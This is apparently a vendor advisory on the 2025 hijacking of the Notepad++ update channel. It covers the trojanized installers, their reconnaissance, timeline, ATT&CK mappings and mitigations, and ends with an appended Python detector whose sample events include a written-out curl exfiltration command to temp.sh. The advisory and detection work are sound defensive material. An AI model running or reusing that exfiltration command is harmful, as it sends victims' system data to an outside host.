Notepad++ Update Mechanism Hijacked: Supply Chain Attack Delivers Malware to Targeted Users
- Rescana

Executive Summary
A critical security incident affecting the Notepad++ text editor was identified between June and December 2025, in which the official update mechanism was hijacked to deliver malware to select users. Attackers compromised the shared hosting infrastructure of the Notepad++ website, enabling them to intercept and redirect update requests from targeted users to malicious servers. This allowed the delivery of trojanized installers that could enumerate system and network information and exfiltrate data, potentially leading to full system compromise. The attack did not exploit a vulnerability in Notepad++ code itself but rather leveraged insufficient update verification controls in older versions and weaknesses at the hosting provider level. The incident was highly targeted, with evidence suggesting involvement by a Chinese state-sponsored threat actor, although direct attribution remains circumstantial. Remediation actions included migration to a new, more secure hosting provider and the implementation of strict digital signature and certificate verification in the update process starting with version 8.8.9. Users are strongly advised to update to the latest version, verify installer signatures, and remain vigilant for suspicious update behavior. This report is based solely on primary, independently corroborated sources, with all technical claims supported by direct evidence.
Technical Information
The compromise of the Notepad++ update mechanism was executed through a multi-stage attack that began with the infiltration of the shared hosting server used by the official Notepad++ website. Attackers specifically targeted the update endpoint (getDownloadUrl.php), which is responsible for providing update metadata and download URLs to client installations. The initial compromise occurred at the infrastructure level, not through a vulnerability in the Notepad++ application code. This distinction is critical, as it underscores the importance of supply chain and infrastructure security for widely used open-source projects.
After gaining access to the hosting server, the attackers were able to intercept and selectively redirect update requests from certain users to attacker-controlled servers. This redirection was not indiscriminate; logs and analysis indicate that only specific users or organizations were targeted, suggesting a high degree of operational security and intent. The attackers maintained persistence even after direct server access was lost on September 2, 2025, by retaining credentials to internal hosting provider services. This allowed them to continue redirecting update traffic until December 2, 2025, when all access was definitively terminated following credential rotation and security hardening by the hosting provider.
The malicious update process involved serving trojanized Notepad++ installers to targeted users. Technical analysis by Bitdefender revealed that the rogue updater behavior included the spawning of an unauthorized executable, AutoUpdater.exe, by the legitimate GUP.exe updater component. This malicious executable performed a series of reconnaissance actions, including listing network connections, system details, running processes, and the current user. The collected information was saved to a file (a.txt) and exfiltrated using curl to temp[.]sh, an anonymous file-sharing service previously observed in other malware campaigns. The legitimate WinGUp updater only uses the libcurl library internally and does not launch curl.exe or perform host reconnaissance, making this behavior a clear indicator of compromise.
The attack leveraged the lack of cryptographic verification in older versions of Notepad++. Prior to version 8.8.9, the updater did not enforce strict digital signature or certificate validation for downloaded installers, allowing attackers to substitute malicious payloads if they could control the update metadata or download URL. This supply chain weakness was exploited to deliver malware under the guise of legitimate updates.
In response, the Notepad++ development team released version 8.8.8 in November 2025, which restricted update downloads to trusted sources (GitHub). A more comprehensive fix was implemented in version 8.8.9, released on December 9, 2025, which introduced mandatory digital signature and certificate verification for all update packages. The update process now aborts if the installer is unsigned or improperly signed, effectively mitigating the risk of similar attacks via update channel hijacking. Additionally, the XML metadata returned by the update server is now signed using XMLDSig, with enforcement of certificate and signature verification planned for version 8.9.2.
The attack is mapped to several MITRE ATT&CK techniques, including T1195.002 (Supply Chain Compromise), T1557.002 (Man-in-the-Middle), T1078 (Valid Accounts), T1204.002 (User Execution: Malicious File), T1082 (System Information Discovery), and T1041 (Exfiltration Over C2 Channel). The technical evidence supporting these mappings includes server logs, malware behavior, and the use of known exfiltration channels.
Attribution analysis suggests the involvement of a Chinese state-sponsored group, based on the sophistication of the attack, the selective targeting, and the operational patterns observed. However, this attribution is assessed with medium confidence, as there are no direct technical artifacts linking the attack to a specific group. The use of temp[.]sh for exfiltration and the focus on supply chain compromise are consistent with previous Chinese APT operations, such as the CCleaner and ShadowPad incidents, but are not unique to any one actor.
The incident highlights the broader risks associated with software supply chain attacks, particularly for open-source tools widely used across government, enterprise, and critical infrastructure sectors. The selective targeting observed in this case underscores the need for robust cryptographic verification in all software update mechanisms and the importance of securing third-party infrastructure.
Affected Versions & Timeline
The affected versions of Notepad++ are all releases prior to version 8.8.9. The compromise began in June 2025, with attackers maintaining some level of access to the hosting infrastructure until December 2, 2025. The most active period of malicious redirection and update hijacking occurred between June and November 10, 2025. Direct server access by the attackers was lost on September 2, 2025, following scheduled maintenance and security updates by the hosting provider. However, the attackers retained credentials to internal services, allowing continued exploitation until all credentials were rotated and security hardening was completed on December 2, 2025. The attack is considered fully remediated as of this date, with all attacker access terminated and no evidence of ongoing compromise.
Threat Activity
The threat activity associated with this incident was characterized by a highly targeted supply chain attack. Attackers compromised the shared hosting server used by the Notepad++ website, focusing specifically on the update endpoint to intercept and redirect update requests. The redirection was selective, targeting specific users or organizations rather than the entire user base. This approach is consistent with advanced persistent threat (APT) operations seeking to minimize detection and maximize impact on high-value targets.
The malicious payload delivered via the hijacked update mechanism was a trojanized installer that, when executed, performed system and network reconnaissance. The malware enumerated network connections, system details, running processes, and the current user, saving the results to a file and exfiltrating the data using curl to temp[.]sh. This behavior indicates an initial access and reconnaissance phase, potentially as a precursor to further exploitation or lateral movement within targeted organizations.
There is no evidence to suggest that the malware included ransomware or destructive capabilities. The focus was on information gathering and exfiltration, consistent with espionage-oriented objectives. The use of legitimate update channels and the selective targeting of victims demonstrate a high level of sophistication and operational security.
The attack exploited the lack of cryptographic verification in the Notepad++ update process prior to version 8.8.9. By controlling the update metadata and download URLs, attackers were able to deliver malicious payloads that appeared legitimate to end users. The incident underscores the importance of end-to-end integrity and authenticity checks in software update mechanisms.
Mitigation & Workarounds
The following mitigation actions are recommended, prioritized by severity:
- Critical: All users of Notepad++ should immediately update to version 8.8.9 or later, which includes strict digital signature and certificate verification for all update packages. This is the most effective measure to prevent exploitation of the update mechanism.
- High: Users should verify that any Notepad++ installer is signed by GlobalSign and that Windows reports "This digital signature is OK." Only installers downloaded from the official Notepad++ website or trusted sources such as GitHub should be used. Avoid downloading or executing installers from unofficial websites or third-party sources.
- High: Remove any old Notepad++ self-signed certificates from the system certificate store to ensure that only trusted signatures are accepted during the update process.
- Medium: Monitor the updater and TEMP folders for unusual files. Legitimate updates are handled automatically by WinGUp.exe and the official installer. The presence of unexpected files such as update.exe or AutoUpdater.exe may indicate compromise and should be investigated immediately.
- Medium: Back up important files before performing updates to prevent potential data loss in the event of a failed or malicious update.
- Low: Organizations should review their software supply chain security practices, including the use of cryptographic verification for all third-party software updates and the security of hosting and distribution infrastructure.
These recommendations are based on guidance from the Notepad++ development team, Bitdefender, and the Rwanda National Cyber Security Authority. Users and organizations should remain vigilant for any unusual update behavior and report suspected incidents to their security teams or relevant authorities.
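Detection logic for the indicators described in Technical Information and in the Medium monitoring item above (GUP.exe spawning the rogue AutoUpdater.exe, and a curl.exe upload to temp[.]sh), as an added example that is not Rescana's, Bitdefender's or Notepad++'s code. The event field names, the expected installer naming pattern and the sample events are assumptions constructed for this demonstration.

```python
import ntpath

# Assumption for this example: the only process the legitimate GUP.exe
# updater should launch is the official installer (npp.<version>.Installer*.exe).
def is_official_installer(image):
    name = ntpath.basename(image).lower()
    return name.startswith("npp.") and "installer" in name and name.endswith(".exe")

def detect(events):
    """Return (rule, evidence) pairs for suspicious process-creation events.

    Each event is a dict with 'parent', 'image' and 'cmdline' keys, roughly
    Sysmon Event ID 1; the field names are an assumption of this example.
    """
    findings = []
    for ev in events:
        parent = ntpath.basename(ev["parent"]).lower()
        image = ntpath.basename(ev["image"]).lower()
        cmdline = ev.get("cmdline", "").lower()
        # Indicator 1: GUP.exe spawning anything but the official installer
        # (Bitdefender observed it launching a rogue AutoUpdater.exe).
        if parent == "gup.exe" and not is_official_installer(image):
            findings.append(("unexpected GUP.exe child", ev["image"]))
        # Indicator 2: WinGUp uses libcurl in-process and never runs curl.exe,
        # so a curl.exe upload to temp.sh (defanged as temp[.]sh in the
        # report) is the exfiltration step of the trojanized updater.
        if image == "curl.exe" and "temp.sh" in cmdline:
            findings.append(("curl.exe upload to temp.sh", ev["cmdline"]))
    return findings

# Constructed sample telemetry, not real logs: one legitimate update,
# then the rogue AutoUpdater.exe and its curl.exe exfiltration.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Notepad++\updater\GUP.exe",
     "image": r"C:\Users\alice\AppData\Local\Temp\npp.8.8.7.Installer.x64.exe",
     "cmdline": "npp.8.8.7.Installer.x64.exe /S"},
    {"parent": r"C:\Program Files\Notepad++\updater\GUP.exe",
     "image": r"C:\Users\alice\AppData\Local\Temp\AutoUpdater.exe",
     "cmdline": "AutoUpdater.exe"},
    {"parent": r"C:\Users\alice\AppData\Local\Temp\AutoUpdater.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": 'curl.exe -F "file=@a.txt" https://temp.sh/upload'},
]

if __name__ == "__main__":
    for rule, evidence in detect(SAMPLE_EVENTS):
        print(f"[ALERT] {rule}: {evidence}")
```

Run against real process-creation telemetry, the first rule also catches GUP.exe launching curl.exe or update.exe directly, not only the AutoUpdater.exe name reported here.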
References
Notepad++ Official Disclosure: https://notepad-plus-plus.org/news/hijacked-incident-info-update/ (2026-02-02)
Bitdefender Technical Analysis: https://www.bitdefender.com/en-us/blog/hotforsecurity/notepad-tightens-update-security-after-suspected-hijack-attempts (2025-12-12)
Rwanda National Cyber Security Authority Advisory: https://cyber.gov.rw/updates/article/security-alert-notepad-update-vulnerability-enables-malware-installation/ (2025-12-12)
MITRE ATT&CK T1195.002 (Supply Chain Compromise): https://attack.mitre.org/techniques/T1195/002/
MITRE ATT&CK T1557.002 (Man-in-the-Middle): https://attack.mitre.org/techniques/T1557/002/
MITRE ATT&CK T1078 (Valid Accounts): https://attack.mitre.org/techniques/T1078/
MITRE ATT&CK T1204.002 (User Execution: Malicious File): https://attack.mitre.org/techniques/T1204/002/
MITRE ATT&CK T1082 (System Information Discovery): https://attack.mitre.org/techniques/T1082/
MITRE ATT&CK T1041 (Exfiltration Over C2 Channel): https://attack.mitre.org/techniques/T1041/
About Rescana
Rescana provides a third-party risk management (TPRM) platform designed to help organizations identify, assess, and monitor risks in their software supply chain and vendor ecosystem. Our platform enables continuous monitoring of supplier infrastructure, automated risk scoring, and actionable insights to support incident response and remediation planning. For questions or further information, please contact us at ops@rescana.com.